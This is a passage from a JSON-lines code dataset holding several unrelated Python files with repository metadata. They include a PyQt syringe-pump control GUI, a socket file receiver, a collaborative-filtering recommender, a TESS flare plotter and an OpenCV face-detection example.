max_hours_since_last_position=current_position_estimation_max_hours,\n )\n last_positions = join(\n last_positions,\n risk_factors,\n pending_alerts,\n reportings,\n beacon_malfunctions,\n )\n\n last_positions = drop_duplicates(last_positions)\n\n # Load\n load_last_positions(last_positions)\n\nflow.file_name = Path(__file__).name\n","repo_name":"MTES-MCT/monitorfish","sub_path":"datascience/src/pipeline/flows/last_positions.py","file_name":"last_positions.py","file_ext":"py","file_size_in_byte":16574,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"76"} +{"seq_id":"29729429972","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\ndataset = pd.read_csv('data.csv')\nx = dataset.iloc[:, 0].values\nhist, bins = np.histogram(x, bins = 4)\nprint(bins)\nplt.hist(x, bins = 4)\nplt.show()\nm = x.mean()\nprint(m)","repo_name":"saranthn/ExtractiveTextSummarizer-BERT","sub_path":"histogram_wcss.py","file_name":"histogram_wcss.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"33347665723","text":"from PyQt5.QtCore import Qt, QTimer\nfrom PyQt5.QtGui import QDoubleValidator\nfrom PyQt5.QtWidgets import (QWidget, QPushButton, QLabel, QGridLayout, QLineEdit, QGroupBox, QScrollArea, QRadioButton,\n QSlider)\n\nclass PumpArea(QScrollArea):\n \"\"\"Scroll area containing pump widgets.\"\"\"\n\n def __init__(self, pump_number, controller_settings, gui_settings, terminal, GUI_queues):\n super().__init__()\n\n # Queue and settings\n self.GUI_queues = GUI_queues\n self.terminal = terminal\n self.setWidgetResizable(True)\n self.horizontalScrollBar().setEnabled(True)\n self.verticalScrollBar().setEnabled(False)\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n # Create layout\n pump = QWidget()\n self.setWidget(pump)\n pump_layout = QGridLayout()\n pump_layout.setAlignment(Qt.AlignLeft)\n pump.setLayout(pump_layout)\n\n self.n_pumps = pump_number\n self.controller_settings = controller_settings\n\n # Add Pump widgets\n self.Pumps = []\n starting_columns = [0, 4, 8, 12, 16, 20, 24, 28]\n for i in range(1, self.n_pumps + 1):\n self.Pumps.append(Pump(i, self.process_gui_settings(gui_settings, i-1), terminal, GUI_queues))\n pump_layout.addWidget(self.Pumps[-1], 0, starting_columns[i - 1], -1, 4)\n \n # Poll the queue every 1000 ms\n self.timer = QTimer()\n self.timer.timeout.connect(self.process_queue)\n self.timer.start(100)\n\n def process_gui_settings(self, gui_settings, pump_number):\n \"\"\"Process gui_settings and returns values for a specific pump.\"\"\"\n pump_values = []\n keys = [\"pressure\", \"speed\", \"volume\"]\n for key, value in gui_settings.items():\n if key in keys:\n pump_values.append(value[pump_number])\n pump_values.append(self.controller_settings['Syringe volume (μl)'][pump_number])\n\n return pump_values\n\n def process_queue(self):\n \"\"\"Process To_GUI_queue and update widgets if new data is present.\"\"\"\n \n ln = self.GUI_queues[0].qsize()\n need_to_update = False\n for i in range(ln):\n msg = self.GUI_queues[0].get()\n \n # Check if the queue data is for the graph\n if msg[0] == \"ToGUI_PumpSpeeds\":\n need_to_update = True\n # Convert incoming data to floats\n pump_speeds = [float(item) for item in msg[1]]\n for i, pump_speed in enumerate(pump_speeds):\n self.Pumps[i].Speed = pump_speed\n\n elif msg[0] == \"ToGUI_PumpPositions\":\n need_to_update = True\n # Convert incoming data to floats\n pump_positions = [float(item) for item in msg[1]]\n for i, pump_position in enumerate(pump_positions):\n self.Pumps[i].Position = pump_position\n\n else:\n self.GUI_queues[0].put(msg) #message is for someone else\n \n if need_to_update:\n for p_i in self.Pumps:\n p_i.update()\n\nclass Pump(QGroupBox):\n \"\"\"Individual pump widget.\"\"\"\n\n def __init__(self, pump_number, pump_values, terminal, GUI_queues):\n super().__init__()\n \n self.terminal = terminal\n self.GUI_queues = GUI_queues\n self.pump_number = pump_number\n self.Speed = 0.0\n self.Position = 0.0\n self.MaxPosition = pump_values[3]\n self.pres_reg_on = False\n \n # Set title and layout\n self.setTitle(\"Pump \" + str(pump_number))\n self.pump_layout = QGridLayout(self)\n self.setLayout(self.pump_layout)\n\n # Set validators\n self.validator = QDoubleValidator(self)\n self.validator.setNotation(QDoubleValidator.ScientificNotation)\n self.volume_validator = QDoubleValidator(self)\n self.validator.setNotation(QDoubleValidator.ScientificNotation)\n \n # Create and configure elements\n self.pressure_label = QLabel(self, text=\"Pressure (kPa)\", alignment=Qt.AlignLeft)\n self.pressure_box = QLineEdit(text=pump_values[0])\n self.pressure_box.setValidator(self.validator)\n self.pressure_box.returnPressed.connect(self.on_pressure_entered)\n self.pressure_set = QPushButton(text=\"Pressure set\")\n self.pressure_set.clicked.connect(self.on_pressure_entered)\n self.pressure_regulate = QPushButton(text=\"Pressure regulate\")\n self.pressure_regulate.clicked.connect(self.on_pressure_regulate)\n\n self.speed_label = QLabel(self, text=\"Speed (μl/s)\")\n self.speed_box = QLineEdit(text=pump_values[1])\n self.speed_box.setValidator(self.validator)\n self.speed_box.returnPressed.connect(self.on_speed_entered)\n\n self.volume_label = QLabel(self, text=\"Volume (μl)\")\n self.volume_box = QLineEdit(text=pump_values[2])\n self.volume_box.setValidator(self.volume_validator)\n self.volume_box.returnPressed.connect(lambda: self.on_volume_entered(True))\n\n self.movebk_button = QPushButton(text=\"Move Back\")\n self.movebk_button.clicked.connect(lambda: self.on_volume_entered(False)) \n self.move_button = QPushButton(text=\"Move\")\n self.move_button.clicked.connect(lambda: self.on_volume_entered(True))\n\n self.move_absolute = QRadioButton(\"Move absolute\")\n self.move_absolute.clicked.connect(self.on_movetype)\n self.move_relative = QRadioButton(\"Move relative\")\n self.move_relative.clicked.connect(self.on_movetype)\n self.move_relative.setChecked(True)\n\n self.home_box = QGroupBox(\"Home pump\")\n self.home_layout = QGridLayout(self)\n self.home_box.setLayout(self.home_layout)\n\n self.home_up_button = QPushButton(text=\"Max\")\n self.home_up_button.clicked.connect(lambda: self.on_home(False))\n self.home_down_button = QPushButton(text=\"Zero\")\n self.home_down_button.clicked.connect(lambda: self.on_home(True))\n\n self.home_layout.addWidget(self.home_up_button, 0, 1, 1, 1)\n self.home_layout.addWidget(self.home_down_button, 0, 0, 1, 1)\n\n self.speed_display = QLabel(self, text=\"Speed (μl/s): 0.0\")\n self.speed_display.setFixedWidth(125)\n self.position_display = QLabel(self, text=\"Position (μl): 0.0\")\n self.position_display.setFixedWidth(125)\n\n self.slider = QSlider(Qt.Horizontal)\n self.slider.setValue(100)\n self.slider.sliderReleased.connect(self.on_slider_released)\n\n # Add elements to layout\n self.pump_layout.addWidget(self.pressure_label, 0, 0)\n self.pump_layout.addWidget(self.pressure_box, 0, 1)\n self.pump_layout.addWidget(self.pressure_set, 1, 0)\n self.pump_layout.addWidget(self.pressure_regulate, 1, 1)\n\n self.pump_layout.addWidget(self.speed_label, 2, 0)\n self.pump_layout.addWidget(self.speed_box, 2, 1)\n self.pump_layout.addWidget(self.volume_label, 3, 0)\n self.pump_layout.addWidget(self.volume_box, 3, 1)\n self.pump_layout.addWidget(self.movebk_button, 4, 1)\n self.pump_layout.addWidget(self.move_button, 4, 0)\n\n self.pump_layout.addWidget(self.move_absolute, 5, 0)\n self.pump_layout.addWidget(self.move_relative, 5, 1)\n\n self.pump_layout.addWidget(self.home_box, 6, 0, 1, -1)\n\n self.pump_layout.addWidget(self.speed_display, 7, 0)\n self.pump_layout.addWidget(self.position_display, 8, 0)\n self.pump_layout.addWidget(self.slider, 8, 1, 1, -1, Qt.AlignCenter)\n\n def update(self):\n self.speed_display.setText (f\"Speed (μl/s): {self.Speed:.2f}\")\n self.position_display.setText (f\"Position (μl): {self.Position:.0f}\")\n value = self.Position/self.MaxPosition*100\n self.slider.setValue(int(round(value)))\n\n def on_pressure_entered(self):\n # This function is called when the user enters data in pressure_box\n value = float(self.pressure_box.text())\n self.GUI_queues[1].put([\"FromGUI_Target\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"Target {self.pump_number-1} {value}\")\n \n \n def on_pressure_regulate(self):\n if self.pres_reg_on:\n self.GUI_queues[1].put([\"FromGUI_StopAdjust\", [self.pump_number-1]])\n self.terminal.print_text(f\"StopAdjust {self.pump_number-1}\")\n self.pres_reg_on = False\n \n else:\n self.on_pressure_entered()\n self.GUI_queues[1].put([\"FromGUI_StartAdjust\", [self.pump_number-1]])\n self.terminal.print_text(f\"StartAdjust {self.pump_number-1}\")\n self.pres_reg_on = True\n \n def on_speed_entered(self):\n # This function is called when the user enters data in pressure_box\n value = float(self.speed_box.text())\n self.GUI_queues[1].put([\"FromGUI_Speed\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"Speed {self.pump_number-1} {value}\")\n\n def on_volume_entered(self, forward):\n # This function is called when the user enters data in pressure_box\n value = float(self.volume_box.text())\n if not forward:\n value = -value\n self.on_speed_entered()\n if self.move_absolute.isChecked():\n self.GUI_queues[1].put([\"FromGUI_MoveAbs\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"MoveAbs {self.pump_number-1} {value}\")\n else:\n self.GUI_queues[1].put([\"FromGUI_MoveRel\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"MoveRel {self.pump_number-1} {value}\")\n \n def on_movetype(self):\n if self.move_relative.isChecked():\n self.movebk_button.setEnabled(True)\n self.volume_validator.setBottom(float('-inf'))\n else:\n value = float(self.volume_box.text())\n self.volume_box.setText(str(abs(value)))\n self.movebk_button.setEnabled(False)\n self.volume_validator.setBottom(0.0)\n \n def on_home(self, zero_dir):\n value = 1\n if zero_dir:\n value = 0\n self.GUI_queues[1].put([\"FromGUI_Home\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"Home {self.pump_number-1} {value}\")\n \n def on_slider_released(self):\n value = self.slider.value()\n value = value / 100.0 * self.MaxPosition\n self.on_speed_entered()\n self.GUI_queues[1].put([\"FromGUI_MoveAbs\", [self.pump_number-1, value]])\n self.terminal.print_text(f\"MoveAbs {self.pump_number-1} {value}\")\n \n\n\n","repo_name":"manatee-fluidics/Manatee","sub_path":"GUI/main_window_pumps.py","file_name":"main_window_pumps.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29275212708","text":"from kfile import *\nfrom khost import *\nimport socket\n\n\nclass KReceiver:\n def __init__(self, khost, kfilewriter):\n \"\"\"\n :param khost: Information of sender\n :param kfilewriter: Information of file that will be created\n\n :type khost: KHost\n :type kfilewriter: KFileWriter\n \"\"\"\n self.sender = khost\n self.file = kfilewriter\n\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.bind((khost.addr, khost.port))\n self.socket.listen(2)\n\n def start_listening(self):\n print(\"Listening for coming connactions...\")\n sender, addr = self.socket.accept()\n\n print(\"[*] Accepted connection from : %s:%d\" % (addr[0], addr[1]))\n self.start_receiving(sender)\n\n def start_receiving(self, sender):\n # Receive header\n header = self.recv(sender).decode(\"utf-8\")\n self.file.header_to_file(header)\n print(\"[*] Header is received : \" + header)\n\n # Receive data till |END| flag is received\n while True:\n data = self.recv(sender)\n if data == b\"\":\n break\n self.file.write(data)\n\n self.file.finish_writing()\n\n # Receive end flag\n finish_flag = self.recv(sender).decode(\"utf-8\")\n self.socket.close()\n\n if finish_flag == \"|END|\":\n print(\"Receiving successfuly finished.\")\n return 1\n\n print(\"Receiving is not successful. Missing finish flag.\")\n return 0\n\n def recv(self, sender):\n data = sender.recv(16).decode(\"utf-8\")\n # print(\"DATA :\", data)\n data_len = int(data)\n # data_len = int(sender.recv(16).decode(\"utf-8\"))\n return sender.recv(data_len)\n\n\nif __name__ == \"__main__\":\n host = KHost(\"0.0.0.0\", 9301)\n file = KFileWriter(\"/home/ft/Downloads/new-ft.zip\")\n\n receiver = KReceiver(host, file)\n receiver.start_listening()\n receiver.socket.close()\n","repo_name":"furkantokac/KLocalShare","sub_path":"src/kreceiver.py","file_name":"kreceiver.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"26365757129","text":"import input\n\nimport math\n\nfrom bge import logic\n\nclass Panel(object):\n def __init__(self):\n self.scene = logic.getCurrentScene()\n self.reverse_x_button = self.scene.objects['ReverseXButton']\n self.reverse_y_button = self.scene.objects['ReverseYButton']\n self.camera = self.scene.objects['CommandPanelCamera']\n self.restore = None\n self.reverse_x = False\n self.reverse_y = False\n\n def enable(self):\n self.scene.active_camera = self.camera\n input.service.push_mouse_hooks({\n 'ReverseXButton': lambda : self.toggle_x(),\n 'ReverseYButton': lambda : self.toggle_y(),\n 'CommandPanelExitButton': lambda : self.exit(),\n })\n input.service.push_keyboard_hooks({})\n\n def toggle_x(self):\n self.reverse_x = not self.reverse_x\n if self.reverse_x:\n self.reverse_x_button.playAction('ReverseXButtonAction', 0, 30,\n play_mode = logic.KX_ACTION_MODE_PLAY,\n layer = 0,\n speed = 5.0)\n else:\n self.reverse_x_button.playAction('ReverseXButtonAction', 30, 60,\n play_mode = logic.KX_ACTION_MODE_PLAY,\n layer = 1,\n speed = 5.0)\n\n def toggle_y(self):\n self.reverse_y = not self.reverse_y\n if self.reverse_y:\n self.reverse_y_button.playAction('ReverseYButtonAction', 0, 30,\n play_mode = logic.KX_ACTION_MODE_PLAY,\n layer = 0,\n speed = 5.0)\n else:\n self.reverse_y_button.playAction('ReverseYButtonAction', 30, 60,\n play_mode = logic.KX_ACTION_MODE_PLAY,\n layer = 0,\n speed = 5.0)\n\n def exit(self):\n input.service.pop_mouse_hooks()\n input.service.pop_keyboard_hooks()\n self.restore()\n\npanel = Panel()\n\n","repo_name":"alex-ac/edugame-contest-project","sub_path":"panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34418990355","text":"from common import *\nimport math\n\n\nglobal_userSimilarities = dict()\n\n#得到两个用户共同操作过的 item categories\ndef getItemIntersectionByUser(user1, user2):\n\titemsUser1_Opted = set(global_user_item_dict[user1].keys())\n\titemsUser2_Opted = set(global_user_item_dict[user2].keys())\n\n\treturn itemsUser1_Opted.union(itemsUser2_Opted) ^ (itemsUser1_Opted ^ itemsUser2_Opted)\n\n#这里通过两个用户共同操作了多少个相同的item category来计算用户相似度,而不是通过共同操作了多少个相同的item,\n#因为 test 中的item 不是都出现在train中\ndef userSimilarity_IIF():\n\tprint(getCurrentTime(), \" userSimilarity_IIF\")\n\titem_category_cnt = len(global_item_user_dict)\n\titem_category_idx = 0\n\n\tfor (item_id, user_ids) in global_item_user_dict.items():\t\t\n\t\titem_category_idx += 1\n\t\tuserCnt = len(user_ids)\n\t\tuser_id_list = list(user_ids)\n\t\tuserIdx1 = 0\n\t\tprint(\"%s userCF: item category %s [%d/%d] is operated by %d users.\" % \\\n\t\t \t (getCurrentTime(), item_id, item_category_idx, item_category_cnt, userCnt))\n\n\t\twhile (userIdx1 < userCnt):\n\t\t\tuserIdx2 = userIdx1 + 1\n\t\t\twhile (userIdx2 < userCnt):\n\t\t\t\tuser1_id = user_id_list[userIdx1]\n\t\t\t\tuser2_id = user_id_list[userIdx2]\n\n\t\t\t\tuserIdx2 += 1\n\n\t\t\t\t# 查看是否已经计算过 user1, user2的相似度,若没有,则将sim 插入到\n\t\t\t\t# global_userSimilarities[key1][key2] 的位置\n\t\t\t\t# key1, key2 分别为 < user1, user2> or \n\t\t\t\tkey1, key2 = getPosOfDoubleHash(user1_id, user2_id, global_userSimilarities)\n\t\t\t\tif (key1 == None):\n\t\t\t\t\tcontinue\n\n\t\t\t\titemCatsUser1and2_Opted = getItemIntersectionByUser(user1_id, user2_id)\n\t\t\t\tsim = 0.0\n\t\t\t\tfor item_category in itemCatsUser1and2_Opted:\n\t\t\t\t\tsim += 1 / math.log(1 + len(global_item_user_dict[item_category][USER_ID]))\n\n\t\t\t\tsim /= math.sqrt( len(global_user_item_dict[user1_id]) * \\\n\t \t len(global_user_item_dict[user2_id]) )\n\n\t\t\t\tglobal_userSimilarities[key1][key2] = sim\n\n\t\t\t\tlogging.info(\"%s userCF [%s -- %s] = %.3f\" % (getCurrentTime(), key1, key2, sim))\n\n\t\t\tuserIdx1 += 1\n\n\treturn 0\n\ndef recommendationUserCF(topK):\n\tlogging.info(\"recommendationUserCF topK %d\", topK)\n\n\tuser_sim_topK = dict()\n\n\tfor user1_id in global_userSimilarities.keys():\n\t\tlogging.info(\"calculating similiarity for %s\" % user1_id)\n\t\t\n\t\t\n\t\tuser_sim_topK[user1_id] = []\n\t\tusers_no_sim = \"\"\n\n\t\t# 计算每个用户相似度的 topK\n\t\tfor user2_id in global_userSimilarities.keys():\n\t\t\tif (user1_id == user2_id):\n\t\t\t\tcontinue\n\n\t\t\tsimiliarity = 0.0\n\t\t\tif (user2_id in global_userSimilarities[user1_id]):\n\t\t\t\tsimiliarity = global_userSimilarities[user1_id][user2_id]\n\t\t\telif (user1_id in global_userSimilarities[user2_id]):\n\t\t\t\tsimiliarity = global_userSimilarities[user2_id][user1_id]\n\t\t\telse:\n\t\t\t\tusers_no_sim += \"%s \" % user2_id\n\t\t\t\tcontinue\n\n\t\t\t# topK 是一个数组, 数组中的每个元素是一个两个元素的数组,第一个是user id, 第二个是similiarity\n\t\t\tif (len(user_sim_topK[user1_id]) < topK):\n\t\t\t\tuser_sim_topK[user1_id].append([user2_id, similiarity])\n\t\t\telse:\n\t\t\t\tmax_sim = 0\n\t\t\t\tmin_sim = 0\n\n\t\t\t\tfor idx in range(topK):\n\t\t\t\t\tif (user_sim_topK[user1_id][min_sim][1] > user_sim_topK[user1_id][idx][1]):\n\t\t\t\t\t\tmin_sim = idx\n\n\t\t\t\tif (similiarity > user_sim_topK[user1_id][min_sim][1]):\n\t\t\t\t\tuser_sim_topK[user1_id][min_sim][0] = user2_id\n\t\t\t\t\tuser_sim_topK[user1_id][min_sim][1] = similiarity\n\n\t\t\t\t# \tif (user_sim_topK[user1_id][max_sim][1] < user_sim_topK[user1_id][idx][1]):\n\t\t\t\t# \t\tmax_sim = idx\n\n\t\t\t\t# if (similiarity > user_sim_topK[user1_id][min_sim][1] and \\\n\t\t\t\t# \tsimiliarity < user_sim_topK[user1_id][max_sim][1]):\n\t\t\t\t# \tuser_sim_topK[user1_id][min_sim][0] = user2_id\n\t\t\t\t# \tuser_sim_topK[user1_id][min_sim][1] = similiarity\n\n\t\tif (len(users_no_sim) > 0):\n\t\t\tlogging.info(\"%s has no similiarity with following users: %s\" % (user1_id, users_no_sim))\n\n#\t\tlogging.info(\"top%d of %s is %s\" % (topK, user1_id, user_sim_topK[user1_id]))\n\n\t\t#根据相似度 topK 来计算用户对相应的item categories的权值\n\t\titem_category_weight = calcuteItemCategoryWeight(user1_id, user_sim_topK[user1_id])\n\n\t\t# final weight = 根据相似度 topK 得到的 item categories的权值 * 根据behavior 得到的 item category weight \n\t\t# 推荐 final weight 最大的 category\n\t\tfor category, weight in item_category_weight.items():\n\t\t\titem_category_weight[category] = global_user_item_dict[user1_id][category][\"w\"] * weight\n\n\t\tsorted_category_weight = sorted(item_category_weight.items(), key=lambda d:d[1], reverse=True)\n#\t\tlogging.info(\"user [%s] sorted final category weight %s\" % (user1_id, sorted_category_weight))\n\n\t\t# final weight 最大的 category\n\t\tcategory = sorted_category_weight[0][0]\n\t\tweight = sorted_category_weight[0][1]\n\t\tfinalRecommendation(user1_id, category)\n\treturn 0\n\ndef finalRecommendation(user_id, category):\n\tif (category not in global_train_item):\n\t\treturn\n\n\tfor item_id in global_train_item[category]:\n\t\toutputFile.write(\"%s,%s\\n\" % (user_id, item_id[0]))\n\n\treturn 0\n\n#根据相似度 topK 来计算用户对相应的item categories的权值\ndef calcuteItemCategoryWeight(user_id, user_sim_topK):\n\titem_category_weight = dict()\n\n\t# 根据 topK 中的 similiarity, 来计算所有用户操作过的 item category 的权值\t\t\n\tfor item_category in global_user_item_dict[user_id].keys():\n\t\titem_category_weight[item_category] = 0.0\n\n\t\tfor user_idx in range(len(user_sim_topK)):\n\n\t\t user_in_topK = user_sim_topK[user_idx][0]\n\t\t sim_in_topK = user_sim_topK[user_idx][1]\n\n\t\t if (item_category in global_user_item_dict[user_in_topK]):\n\t\t \titem_category_weight[item_category] += sim_in_topK\n\n\t\t#logging.info(\"user [%s] topK category weight [%s -- %.3f]\" % (user_id, item_category, item_category_weight[item_category]))\n\treturn item_category_weight\n\n #按照权值从大到小排序, 返回一个list\n\t#return sorted(item_category_weight.items(), key=lambda d:d[1], reverse=True)\n\ndef UserCollaborativeFiltering():\n\tuserSimilarity_IIF()\n\treturn 0\n","repo_name":"im2608/taobao_fresh","sub_path":"src/userCF.py","file_name":"userCF.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42874529232","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom astropy.io import fits\nfrom flareTools import id_segments\n\nmpl.rcParams.update({'font.size': 18, 'font.family': 'STIXGeneral', 'mathtext.fontset': 'stix',\n 'image.cmap': 'viridis'})\n\nprefix = 'sec1'\npath = '/astro/store/gradscratch/tmp/scw7/tessData/lightcurves/' + prefix + '/'\ndf = pd.read_csv(prefix+'_flare_out.csv')\ndf_par = pd.read_csv(prefix+'_param_out.csv')\n\nfiles = np.unique(df['file'].values)\n\nfor filename in files:\n tstart = df[df['file'] == filename]['t0'].values\n tstop = df[df['file'] == filename]['t1'].values\n \n entry = df[df['file'] == filename]\n \n fig, axes = plt.subplots(figsize=(16,8), nrows=1, ncols=2)\n \n with fits.open(path+filename, mode='readonly') as hdulist:\n tess_bjd = hdulist[1].data['TIME']\n pdcsap_flux = hdulist[1].data['PDCSAP_FLUX']\n pdcsap_flux_error = hdulist[1].data['PDCSAP_FLUX_ERR']\n quality = hdulist[1].data['QUALITY']\n \n time_smo, smo = np.loadtxt(path+filename+'.gp')\n ok_cut = (quality == 0) & (~np.isnan(tess_bjd)) & (~np.isnan(pdcsap_flux)) & (~np.isnan(pdcsap_flux_error))\n \n dt_limit = 12/24 # 12 hours\n trim = 4/24 # 4 hours\n istart, istop = id_segments(tess_bjd[ok_cut], dt_limit, dt_trim=trim)\n\n time_c = np.array([])\n flux_c = np.array([])\n error_c = np.array([])\n\n for seg_idx in range(len(istart)):\n tess_bjd_seg = tess_bjd[ok_cut][istart[seg_idx]:istop[seg_idx]]\n pdcsap_flux_seg = pdcsap_flux[ok_cut][istart[seg_idx]:istop[seg_idx]]\n pdcsap_flux_error_seg = pdcsap_flux_error[ok_cut][istart[seg_idx]:istop[seg_idx]]\n\n time_c = np.concatenate((time_c, tess_bjd_seg), axis=0)\n flux_c = np.concatenate((flux_c, pdcsap_flux_seg), axis=0)\n error_c = np.concatenate((error_c, pdcsap_flux_error_seg), axis=0)\n \n median = np.nanmedian(flux_c)\n \n axes[0].plot(time_c, flux_c/median)\n axes[0].plot(time_smo, smo)\n axes[0].set_xlabel('Time [BJD - 2457000, days]')\n axes[0].set_ylabel('Flux [e-/s]')\n axes[0].set_title(filename)\n \n x = time_c\n y = flux_c/median - smo + 1\n axes[1].plot(x, y)\n for idx in range(len((tstart))):\n indices = np.where((x >= tstart[idx]) & (x <= tstop[idx]))[0]\n marker = 'x'\n if (entry.iloc[idx]['g_chisq']/entry.iloc[idx]['f_chisq'] > 2) and (entry.iloc[idx]['ed_err']*3 < entry.iloc[idx]['ed']):\n marker = 'o'\n axes[1].plot(x[indices], y[indices], marker)\n axes[1].set_xlabel('Time [BJD - 2457000, days]')\n axes[1].set_ylabel('Normalized Flux')\n plt.savefig('/astro/store/gradscratch/tmp/scw7/tessData/plots/'+filename+'.png')\n plt.close()\n","repo_name":"spencerw/tess_flare","sub_path":"plotLCs.py","file_name":"plotLCs.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11819372449","text":"#!/usr/bin/env python3\n# -*- coding = utf-8 -*-\nimport os\nimport sys\nimport argparse\n\nimport cv2\nimport imutils\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom util.baseimgops import resize, grayscale\n\n# If running from an IDE (not from command line), then enter images here.\nuserimages = [\"test_imgs/groupphoto.jpg\"]\n\n# Load DNN\ndatadir = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"data\", \"dnnfile\")\nnet = cv2.dnn.readNetFromCaffe(os.path.join(datadir, \"model.prototxt\"),\n os.path.join(datadir, \"res10_300x300_ssd_iter_140000_fp16.caffemodel\"))\n\n# Choose Images from LFW\nlfwpath = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"lfw\")\nlfwfiles = os.listdir(lfwpath)\n# Watch out for .DS_Store on MacOS.\nif sys.platform == \"darwin\" and \".DS_Store\" in lfwfiles:\n del lfwfiles[lfwfiles.index(\".DS_Store\")]\n\nrandoms = np.random.randint(1, len(lfwfiles), size = (36))\n\n# Choose image and detect.\nsavedir = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"modded\")\nfor r in randoms:\n img = os.listdir(os.path.join(lfwpath, lfwfiles[r]))[0]\n file, extension = os.path.splitext(img)\n img = cv2.imread(os.path.join(lfwpath, lfwfiles[r], img))\n\n (h, w) = img.shape[:2]\n blob = cv2.dnn.blobFromImage(cv2.resize(img, (300, 300)), 1.0, (300, 300), swapRB=False, crop=False)\n net.setInput(blob)\n faces = net.forward()\n for i in range(0, faces.shape[2]):\n c = faces[0, 0, i, 2]\n if c < 0.5: continue\n box = faces[0, 0, i, 3:7] * np.array([w, h, w, h])\n (x, y, xe, ye) = box.astype(\"int\")\n cv2.rectangle(img, (x, y), (xe, ye), (0, 255, 255), 2)\n\n cv2.imwrite(os.path.join(savedir or \"\", f\"{file}-detect{extension}\"), img)\n\n# Display as a single image.\nsaved_images = os.listdir(savedir)\nfig = plt.figure()\nimg = cv2.imread(os.path.join(savedir, saved_images[0]))\nfinalimg = []\n\nglobal images\ni = 0\nfor a in range(6):\n for b in range(6):\n pixels = cv2.imread(os.path.join(savedir, saved_images[i]))\n if b == 0:\n images = np.array(pixels)\n else:\n images = np.vstack([images, pixels])\n i += 1\n if a == 0:\n finalimg = np.array(images)\n else:\n finalimg = np.hstack([finalimg, images])\n\ncv2.imwrite('images/allfaces.jpg', finalimg)\n\ncv2.imshow('frame', finalimg)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"amogh7joshi/engagement-detection","sub_path":"examples/facedetectionexample.py","file_name":"facedetectionexample.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"70379127606","text":"# © 2019 University of Illinois Board of Trustees. All rights reserved\nimport libCallability\nfrom PySamFastaWrapper import PySamFastaWrapper as ReferenceCache\nimport logging\nimport numpy as np\n\ntry:\n profile\nexcept Exception:\n def profile(x):\n return x\n\n\nclass LocationOutOfBounds(Exception):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\ndef get_hp(tags):\n for item in tags:\n if len(item) == 2 and item[0] == \"HP\":\n return item\n\n return (\"HP\", 0)\n\n\nclass AlleleSearcherLite:\n \"\"\"\n This file provides a python wrapper for the C++ AlleleSearcherLite class\n \"\"\"\n @profile\n def __init__(\n self,\n container,\n start,\n stop,\n ref,\n featureLength=150,\n pacbio=False,\n strict=True,\n useInternalLeftAlignment=False,\n noAlleleLevelFilter=False,\n hybrid_hotspot=False,\n mapq_threshold=10,\n q_threshold=10,\n reassembly_size=10,\n include_hp_tags=False,\n ):\n \"\"\"\n :param container: list/PileupContainerLite\n List of pileupcontainer objects or a single pileupcontainer object\n\n :param start: int\n Left limiting position of interest\n\n :param stop: int\n Right limiting position of interest\n\n :param ref: str/ReferenceCache\n Either path to the reference cache or the reference cache\n\n :param featureLength: int\n Length of feature map\n\n :param pacbio: bool\n Indicate that the reads are for PacBio if we are only using one container\n\n :param strict: bool\n Whether a differingRegion should strictly fall with start and stop\n\n :param useInternalLeftAlignment: bool\n Enable use of C++-based cigar left-alignment\n\n :param noAlleleLevelFilter: bool\n Do not use allele-level filters\n\n :param hybrid_hotspot: bool\n Enable hybrid hotspot detection\n\n :param mapq_threshold: int\n Minimum mapq threshold\n\n :param q_threshold: int\n Minimum quality threshold\n\n :param reassembly_size: int\n Size of reassembly region\n\n :param include_hp_tags: bool\n Include hp tags\n \"\"\"\n self.start = start\n self.stop = stop\n self.strict = strict\n self.featureLength = featureLength\n self.noAlleleLevelFilter = noAlleleLevelFilter\n containers = container if (type(container) is list) else [container]\n self.containers = containers\n self.reassembly_size = reassembly_size\n\n # Arguments for C++ searcher\n reads = []\n names = []\n qualities = []\n refStarts = []\n references = []\n mapq = []\n orientation = []\n cigartuples = []\n hp = []\n self.noReads = [False for i in containers]\n self.pacbio = (len(containers) == 1) and pacbio\n self.hybrid = len(containers) > 1\n self.include_hp_tags = include_hp_tags\n\n for i, container_ in enumerate(containers):\n if len(container_.pileupreads) != 0:\n cigartuples += [[list(x) for x in cigartuple] for cigartuple in container_.cigartuples]\n reads += [p.alignment.query_sequence for p in container_.pileupreads]\n names += [p.alignment.query_name for p in container_.pileupreads]\n qualities += [p.alignment.query_qualities for p in container_.pileupreads]\n refStarts += [p.alignment.reference_start for p in container_.pileupreads]\n mapq += [p.alignment.mapping_quality for p in container_.pileupreads]\n orientation += [-1 if p.alignment.is_reverse else 1 for p in 